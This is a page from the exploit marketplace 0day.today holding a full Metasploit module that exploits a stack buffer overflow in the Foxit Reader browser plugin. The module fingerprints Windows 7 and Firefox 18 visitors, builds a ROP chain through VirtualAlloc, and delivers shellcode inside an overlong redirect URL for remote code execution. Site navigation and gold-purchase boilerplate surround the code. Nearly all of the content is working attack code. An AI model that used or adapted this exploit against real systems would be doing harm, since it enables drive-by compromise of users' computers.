0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Foxit Reader Plugin URL Processing Buffer Overflow
[require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
Rank = NormalRanking
def initialize(info={})
super(update_info(info,
'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
overly long query strings within URLs can cause a stack-based buffer overflow,
which can be exploited to execute arbitrary code. This exploit has been tested
on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
(npFoxitReaderPlugin.dll version 2.2.1.530).
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # initial discovery and poc
'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
'juan vazquez', # metasploit module
],
'References' =>
[
[ 'OSVDB', '89030' ],
[ 'BID', '57174' ],
[ 'EDB', '23944' ],
[ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
[ 'URL', 'http://secunia.com/advisories/51733/' ]
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
# npFoxitReaderPlugin.dll version 2.2.1.530
[ 'Automatic', {} ],
[ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
{
'Offset' => 272,
'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
:rop => :win7_rop_chain
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jan 7 2013",
'DefaultTarget' => 0))
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
#Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
if os_name == 'Windows 7' and firefox =~ /18/
return targets[1]
end
return nil
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def nops
make_nops(4).unpack("N*")
end
# Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
def win7_rop_chain
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
0x41414141, # Filler (RETN offset compensation)
0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll]
0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
0x00001000, # 0x00001000-> edx
0x1000d9ec, # XOR EDX, EDX # RETN
0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
junk,
0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
junk,
junk,
junk,
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
0x00000001, # 0x00000001-> ebx
0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
nops,
0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
].flatten.pack("V*")
return rop_gadgets
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
unless self.respond_to?(my_target[:rop])
print_error("Invalid target specified: no callback function defined")
send_not_found(cli)
return
end
return if ((p = regenerate_payload(cli)) == nil)
# we use two responses:
# one for an HTTP 301 redirect and sending the payload
# and one for sending the HTTP 200 OK with appropriate Content-Type
if request.resource =~ /\.pdf$/
# sending Content-Type
resp = create_response(200, "OK")
resp.body = ""
resp['Content-Type'] = 'application/pdf'
resp['Content-Length'] = rand_text_numeric(3,"0")
cli.send_response(resp)
return
else
resp = create_response(301, "Moved Permanently")
resp.body = ""
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
if datastore['SSL']
schema = "https"
else
schema = "http"
end
sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
sploit << [my_target.ret].pack("V") # EIP
sploit << [my_target['WritableAddress']].pack("V") # Writable Address
sploit << self.send(my_target[:rop])
sploit << p.encoded
resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
cli.send_response(resp)
# handle the payload
handler(cli)
end
end
end
# 0day.today [2024-11-15] #